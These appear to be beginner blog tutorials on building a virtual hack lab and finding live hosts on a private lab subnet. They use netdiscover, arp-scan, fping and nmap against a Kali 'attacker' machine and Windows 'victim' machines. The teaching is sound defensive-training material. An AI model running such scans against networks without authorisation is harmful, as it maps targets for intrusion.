<span style="font-family: "trebuchet ms" , sans-serif;"><i><br /></i></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><i><br /></i></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-21080633418870630092016-09-26T02:40:00.000-07:002016-10-12T02:52:00.544-07:00Scanning Network using Netdiscover, ARP-Scan & ARP to Find Live Hosts<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">ICMP ping sweep is one way to discover live hosts in a
network. It may sometimes be blocked on the network. You then resort to using
an ARP scan to discover live hosts. Like ICMP, ARP can also be blocked on the
network. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">ARP scans have an advantage of finding hidden devices on the network. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://technet.microsoft.com/en-us/library/cc940021.aspx" target="_blank"><br /></a></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://technet.microsoft.com/en-us/library/cc940021.aspx" target="_blank">The Address Resolution Protocol (ARP)</a> is a protocol that
maps <a href="https://en.wikipedia.org/wiki/MAC_address" target="_blank">MAC addresses</a> on the network with IP Addresses and keeps it on a list for
reference. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">How does it work?<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">ARP requests are broadcasted to all the MAC addresses on the
network to request them to respond with their assigned IP addresses. Each
received IP address means a live host. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">ARP Scan using <a href="https://github.com/alexxy/netdiscover" target="_blank">Netdiscover</a></span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Open up your attacker machine terminal and type in the
following command: netdiscover -r 192.168.221.0/24<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Make sure you change the IP range/subnet to yours. This
command with the “-r” flag tells netdiscover to send out ARP requests to the
given subnet. All responds will be displayed on the screen.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-sLdiAHAHgYA/V-jsaQU5m_I/AAAAAAAACmU/ub7HyRYHyw89ypRGLzQ6QjwYPt-XdDggQCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="111" src="https://2.bp.blogspot.com/-sLdiAHAHgYA/V-jsaQU5m_I/AAAAAAAACmU/ub7HyRYHyw89ypRGLzQ6QjwYPt-XdDggQCLcB/s400/1.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">As you can see it has found 4 hosts.</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">ARP Scan using
<a href="https://github.com/royhills/arp-scan" target="_blank">arp-scan</a></span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Type the following command on your terminal: arp-scan --interface=eth0
192.168.221.0/24<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">This command tells arp-scan to scan on the eth0 interface
with which you are connected to the network and scan the given subnet. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-_c4tj7SyeH8/V-jsaeCXAjI/AAAAAAAACmQ/qayUddBGOqQoYrlZfN4Q51xqt04tL_AKACEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://4.bp.blogspot.com/-_c4tj7SyeH8/V-jsaeCXAjI/AAAAAAAACmQ/qayUddBGOqQoYrlZfN4Q51xqt04tL_AKACEw/s400/2.PNG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">The results match Netdiscover, as they both used the same
fundamental network scanning tactic. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
<div class="MsoNormal">
<o:p></o:p></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-51613857616954866662016-09-26T01:55:00.000-07:002016-10-12T02:52:34.511-07:00Scanning Network using Fping, Nmap & ICMP to Find Live Hosts<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">It goes without saying that you need to first know your
target before you can attack one. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Knowing your target is one of the most important things a
security professional has to do. You should spend a good amount of time here. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Basic objectives of network scanning:<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
</div>
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Discover live hosts (IP address) and their OS</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Discover open ports on live hosts</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Discover services running on open ports</span></li>
</ul>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Let’s do this! :) <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Fire up your <a href="https://www.kali.org/" target="_blank">Kali</a>, Windows 7 and XP (if you got one). Make
sure they are all on VMNet1 (Host Only) network. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Go to your attacker machine, open up the terminal and type: ifconfig</span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://1.bp.blogspot.com/-gNXNoHKt5xU/V-jfOOd_GeI/AAAAAAAACl4/1kMFWJmSxo4hz_-ZNs5_HLtAF1lCP3mOwCLcB/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="197" src="https://1.bp.blogspot.com/-gNXNoHKt5xU/V-jfOOd_GeI/AAAAAAAACl4/1kMFWJmSxo4hz_-ZNs5_HLtAF1lCP3mOwCLcB/s400/2.PNG" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">You should see your IP address start with 192.168.x.x. Mine
is 192.168.221.133. With the net-mask of 255.255.255.0, it means I am on the 192.168.221.0/24
network giving me the privilege to talk to any other hosts on my network
directly. <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both;">
</div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="font-family: "trebuchet ms" , sans-serif;">Since this series is not meant for experts, we will not go
through the rest of the information that is displayed. We cover it all in-depth
with our advanced hacking course. More info on this at the bottom of the page.</span></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">A ping sweep is a fundamental
system scanning tactic to discover live hosts on the network.</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">How does it work?</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="margin-left: .25in;">
<span style="font-family: "trebuchet ms" , sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="line-height: 107%;"><span style="font-family: "trebuchet ms" , sans-serif;">It uses the <a href="https://technet.microsoft.com/en-us/library/cc940069.aspx" target="_blank">ICMP protocol</a>. Send ICMP Echo requests
to hosts. If host is alive, you will receive an ICMP Echo response else you
will not receive anything.</span></span></div>
<div class="MsoNormal">
<span style="font-size: 11pt; line-height: 107%;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Ping sweep using <a href="http://fping.org/" target="_blank">Fping</a></span></h3>
</div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Type the following in the terminal:
fping -g 192.168.221.0/24 </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Replace my network address with
yours. You should know yours by now. What this command does with the “-g” flag
is it tells fping to generate a target list on the given subnet. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-3Pn7bCpGj3Y/V-jfOBOfQUI/AAAAAAAACl8/oz0-m2gHvPw3fgL64sGnSFkjRXzcKmalgCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" height="212" src="https://2.bp.blogspot.com/-3Pn7bCpGj3Y/V-jfOBOfQUI/AAAAAAAACl8/oz0-m2gHvPw3fgL64sGnSFkjRXzcKmalgCEw/s400/3.PNG" width="400" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">You should now be able to discover
your Windows 7 and/or XP machines on the virtual lab. As you can see above, 3
hosts are found alive. 1 is my attacker machine and the remaining 2 are the
victim machines. </span></div>
<div class="MsoNormal" style="margin-left: .25in;">
<span style="font-family: "trebuchet ms" , sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<h3>
<br /><span style="line-height: 107%;"><span style="font-family: "trebuchet ms" , sans-serif;">Ping sweep using <a href="https://nmap.org/" target="_blank">Nmap</a></span></span></h3>
</div>
<div class="MsoNormal">
<span style="line-height: 107%;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Nmap is a popular network scanning
tool. It holds more functionality over Fping.</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Type the following in the terminal:
nmap -sP -PI 192.168.221.0/24</span></div>
<div class="MsoNormal" style="margin-left: .25in;">
<span style="font-family: "trebuchet ms" , sans-serif;"><o:p></o:p></span></div>
<br />
<span style="line-height: 107%;"><span style="font-family: "trebuchet ms" , sans-serif;">
Make sure to replace my network address with
yours. What this command does with the "-sP" flag is it tells nmap to run a ping scan and with the "-PI" to run ICMP scan.</span></span><br />
<div>
<span style="font-size: 14.6667px;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Wz9I717toDc/V-j6wQmtdAI/AAAAAAAACmk/Y9K62gA1zmgpf_Fa4aWd09g8Ou9WTDaMgCLcB/s1600/11.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://3.bp.blogspot.com/-Wz9I717toDc/V-j6wQmtdAI/AAAAAAAACmk/Y9K62gA1zmgpf_Fa4aWd09g8Ou9WTDaMgCLcB/s400/11.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Fping discovered 3 hosts are also discovered with Nmap. However there are 2 more extra "hosts" that are discovered with nmap, 192.168.221.1 and 192.168.221.254. Can you guess what they are? Tell us in the comments below. </span><br />
<div>
<div class="MsoNormal">
<span style="line-height: 107%;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">That’s it for now. Take your time to play around with fping
and nmap and see what else you can do with it. We will continue with further
network scanning on the next article. One step at a time.</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">I mentioned about an advanced hacking course earlier. We at
Bitcrack are offering a course that is 110% hands on and technical. For
example, from what we demonstrated today we go in-depth into what other information of “ifconfig”
command and mastering fping and nmap. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">For info on this, send us a tweet <a href="https://twitter.com/bitcrack_cyber" target="_blank">@bitcrack_cyber</a>. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<o:p><i><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></i></o:p></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
</div>
</div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-54402603137886302032016-09-23T05:31:00.000-07:002016-10-12T02:46:50.861-07:00Building Your Own Hack Lab<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Getting started in the intricate world of Security & Hacking? </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">A virtual hack lab is an environment of operating systems
that security professionals use to test out new attack techniques, create
exploits, debug, reverse engineer, developing malware, and all the cyber
security related stuff.</span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">You can host a virtual hack lab using just 1 computer.
The only downside being you need to have at least a moderate level of specs in
the hosting computer. <o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Virtual hack labs can contain hundreds of ‘virtual
machines’ (VMs) but these require high resources that off-the-shelf personal
computers don’t have. So in our virtual hack lab we will start with only 2
virtual machines, which is more than enough to test out and apply basic
concepts. <o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">What you will need:</span></div>
<div class="MsoNoSpacing">
</div>
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Host Machine with a minimum of 6GB of RAM and 80GB of available hard disk space.</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Virtualization Software: VMware Workstation
Player</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Virtual Attack Machine: Kali Linux</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Virtual Victim Machine: Windows XP and Windows 7</span></li>
</ul>
<div class="MsoNoSpacing">
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Setting up the attack machine:</span></h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
</div>
<span style="font-family: "trebuchet ms" , sans-serif;">1. Install VMware Workstation for Free from <a href="https://my.vmware.com/web/vmware/downloads" style="text-indent: -0.25in;" target="_blank">here</a><br />2. Download <b style="text-indent: -0.25in;">Kali Linux 32 bit VM PAE</b><span style="text-indent: -0.25in;"> from </span><a href="https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/" style="text-indent: -0.25in;" target="_blank">here</a><br />3. Unzip the downloaded virtual machine<br />4. Start your VMware and go to File > Open<br />5. Using the Open dialog box, go to the folder where
you unzipped the virtual machine. It should look like this on VMware:</span><br />
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-DgLYZQN-LYs/V-UZIoAa4MI/AAAAAAAAClI/YqifTdrfABoqKxics-u5qdGa3uocC0HWACK4B/s1600/41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" height="282" src="https://4.bp.blogspot.com/-DgLYZQN-LYs/V-UZIoAa4MI/AAAAAAAAClI/YqifTdrfABoqKxics-u5qdGa3uocC0HWACK4B/s400/41.png" width="400" /></span></a></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">6. Select the “Kali-Linux-2016.1-vm-i686” file and
select Open.</span><br />
<span style="text-indent: -0.25in;"><span style="font-family: "trebuchet ms" , sans-serif;">7. Now you should see a window similar to this:</span></span><br />
<span style="text-indent: -0.25in;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-8CSu5e2VTJ8/V-Uaa_IQeHI/AAAAAAAAClM/XpA6JGj2mQ8Pocz_nPkqqPuMJB2BLPDsgCLcB/s1600/42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" height="210" src="https://1.bp.blogspot.com/-8CSu5e2VTJ8/V-Uaa_IQeHI/AAAAAAAAClM/XpA6JGj2mQ8Pocz_nPkqqPuMJB2BLPDsgCLcB/s400/42.png" width="400" /></span></a></div>
<span style="text-indent: -0.25in;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<span style="text-indent: -0.25in;"><span style="font-family: "trebuchet ms" , sans-serif;">Let’s first take a quick look at the important settings
displayed.</span></span><br />
<br />
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Memory:
This is the amount of RAM that you will give to the VM. The more the better,
however you should make sure to have at least 2GB for the host computer (your
computer). And the remaining amount of RAM can be divided between your attack
and victim machine</span></li>
</ul>
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Hard
disk: This is the amount of space you will give to the VM. A preset of 30GB
will do just fine for now. If you are running low on your total HDD space, you
can reduce this to 20GB.</span></li>
</ul>
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Network
Adapter: <b>THIS IS IMPORTANT.</b> A “NAT” setting on the adapter means that it shares
the internet connection of your host computer, meaning it can talk over the internet.
You should only choose NAT when updating the machine or downloading new tools. You
should change this to – Custom: Specific Virtual Network: VMnet1 (Host Only).
This will ensure that your attack machine cannot talk to the internet and you don’t
mistakenly attack a live machine over the internet</span></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-wnvhWvDW4OY/V-Ua0xiJTYI/AAAAAAAAClQ/0xmFtbtHcBERsUwrXluHBGpHAxp9X_hxgCLcB/s1600/43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" height="360" src="https://3.bp.blogspot.com/-wnvhWvDW4OY/V-Ua0xiJTYI/AAAAAAAAClQ/0xmFtbtHcBERsUwrXluHBGpHAxp9X_hxgCLcB/s400/43.png" width="400" /></span></a></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
</div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">For now, leave it at NAT. Because you will be updating
the machine in later stages.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">8. Power on the virtual machine and you will see
the following window.</span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-vJhmnzZ87aI/V-UblEN_1NI/AAAAAAAAClc/11Si3SezTgEooUGQBxJDbhfLHQgNj4CvACLcB/s1600/44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="372" src="https://3.bp.blogspot.com/-vJhmnzZ87aI/V-UblEN_1NI/AAAAAAAAClc/11Si3SezTgEooUGQBxJDbhfLHQgNj4CvACLcB/s400/44.png" width="400" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<!--[if gte vml 1]><v:shape
id="Picture_x0020_4" o:spid="_x0000_i1028" type="#_x0000_t75" style='width:468pt;
height:386.25pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:/Users/Jayesh/AppData/Local/Temp/msohtmlclip1/01/clip_image007.png"
o:title="" croptop="7439f"/>
</v:shape><![endif]--><!--[if !vml]--><span style="font-family: "trebuchet ms" , sans-serif;"><!--[endif]--><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">9. Leave the highlighted entry at “*Kali GNU/Linux” and
press enter.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span>
<br />
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">10. You will now see a grey screen with a username
input box.</span></div>
</div>
<div class="MsoNoSpacing">
<!--[if gte vml 1]><v:shape
id="Picture_x0020_5" o:spid="_x0000_i1027" type="#_x0000_t75" style='width:348.75pt;
height:137.25pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:/Users/Jayesh/AppData/Local/Temp/msohtmlclip1/01/clip_image009.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><span style="font-family: "trebuchet ms" , sans-serif;"><!--[endif]--><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-PFaBy9FvY4c/V-UbzqYv0FI/AAAAAAAAClg/Xa_UzEsz5vIpEdlYHWUynIedDwYqZ_sEgCLcB/s1600/45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="https://3.bp.blogspot.com/-PFaBy9FvY4c/V-UbzqYv0FI/AAAAAAAAClg/Xa_UzEsz5vIpEdlYHWUynIedDwYqZ_sEgCLcB/s320/45.png" width="320" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><b>CHALLENGE</b>: Find out the username and password to login to
the attack machine. <o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">One of the key traits of a hacker is research and an eye
to detail. <o:p></o:p></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><i><b>HINT</b>: The credentials are already somewhere in this
article.</i></span><br />
<br />
<br />
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><b>Welcome to your attack machine!</b></span></div>
</div>
<div class="MsoNoSpacing" style="margin-left: .25in;">
<!--[if gte vml 1]><v:shape
id="Picture_x0020_6" o:spid="_x0000_i1026" type="#_x0000_t75" style='width:468pt;
height:367.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:/Users/Jayesh/AppData/Local/Temp/msohtmlclip1/01/clip_image010.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><span style="font-family: "trebuchet ms" , sans-serif;"><!--[endif]--><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-oHZ8AQsi5Ps/V-UcD9gC4vI/AAAAAAAAClk/GVPh4zqCdG099TfGN8k7WRKtcLRxOWAagCLcB/s1600/46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="313" src="https://4.bp.blogspot.com/-oHZ8AQsi5Ps/V-UcD9gC4vI/AAAAAAAAClk/GVPh4zqCdG099TfGN8k7WRKtcLRxOWAagCLcB/s400/46.png" width="400" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">11. We will not do a tour of the machine yet. Open up the Terminal by clicking on the black
box with an “$_” sign on the right panel.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">12. And type in the following command from the
picture below.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-xR4jR9LEAVg/V-UcW0k3tjI/AAAAAAAAClo/qvCNUgyf26s-dNz8mzpfdJyJjGV_4mhPACLcB/s1600/47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://2.bp.blogspot.com/-xR4jR9LEAVg/V-UcW0k3tjI/AAAAAAAAClo/qvCNUgyf26s-dNz8mzpfdJyJjGV_4mhPACLcB/s400/47.png" width="400" /></a></div>
<div class="" style="clear: both; text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif; text-align: left;"><br /></span></div>
<div class="" style="clear: both; text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif; text-align: left;">This command will update and upgrade your attack machine so
that you have the latest versions of tools and exploits.</span></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><span style="font-family: "trebuchet ms" , sans-serif;">It is going to take a while. So minimize the main VMware
window and let’s get our victim machines installed. <o:p></o:p></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Quick Steps to installing windows 7 and windows XP.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span>
<br />
<div style="text-indent: 0px;">
